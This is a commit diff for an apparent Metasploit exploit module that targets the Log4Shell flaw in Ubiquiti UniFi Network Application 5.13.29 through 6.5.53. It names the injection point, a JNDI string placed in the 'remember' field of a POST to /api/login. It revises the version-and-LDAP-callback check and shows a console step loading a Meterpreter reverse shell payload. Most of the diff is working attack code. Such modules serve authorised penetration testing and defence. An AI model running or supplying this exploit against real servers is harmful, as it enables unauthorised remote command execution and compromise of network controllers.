Add details to check codes and PR feedback
This commit is contained in:
parent
579627f5c7
commit
458d584f83
|
@ -2,8 +2,9 @@
|
|||
|
||||
### Description
|
||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
||||
deserialize a malicious Java object. This results in OS command execution.
|
||||
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
|
||||
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
|
||||
object. This results in OS command execution in the context of the server application.
|
||||
|
||||
This module will start an LDAP server that the target will need to connect to.
|
||||
|
||||
|
@ -33,7 +34,6 @@ Older versions of the UniFi Network Application can be downloaded from [communit
|
|||
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
|
||||
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
|
||||
|
||||
|
||||
```
|
||||
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
|
||||
[*] Using configured payload windows/meterpreter/reverse_tcp
|
||||
|
|
|
@ -14,8 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
|
||||
'Description' => %q{
|
||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
||||
deserialize a malicious Java object. This results in OS command execution.
|
||||
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
|
||||
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
|
||||
object. This results in OS command execution in the context of the server application.
|
||||
|
||||
This module will start an LDAP server that the target will need to connect to.
|
||||
},
|
||||
|
@ -77,10 +78,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def check
|
||||
validate_configuration!
|
||||
res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
|
||||
return Exploit::CheckCode::Unknown if res.nil?
|
||||
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
|
||||
|
||||
server_version = res.get_json_document.dig('meta', 'server_version')
|
||||
return Exploit::CheckCode::Safe unless server_version =~ /(\d+\.)+/
|
||||
return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
|
||||
|
||||
vprint_status("Detected version: #{server_version}")
|
||||
server_version = Rex::Version.new(server_version)
|
||||
|
@ -93,12 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
|
||||
|
||||
start_service
|
||||
trigger
|
||||
res = trigger
|
||||
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
|
||||
|
||||
wait_until { @search_received }
|
||||
return Exploit::CheckCode::Unknown unless @search_received
|
||||
|
||||
Exploit::CheckCode::Vulnerable
|
||||
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
|
||||
ensure
|
||||
stop_service
|
||||
end
|
||||
|
@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'method' => 'POST',
|
||||
'ctype' => 'application/json',
|
||||
'data' => {
|
||||
'username' => jndi_string,
|
||||
'username' => rand_text_alphanumeric(8..16), # can not be blank!,
|
||||
'password' => rand_text_alphanumeric(8..16), # can not be blank!
|
||||
'remember' => jndi_string,
|
||||
'strict' => true
|
||||
|
|
Loading…
Reference in New Issue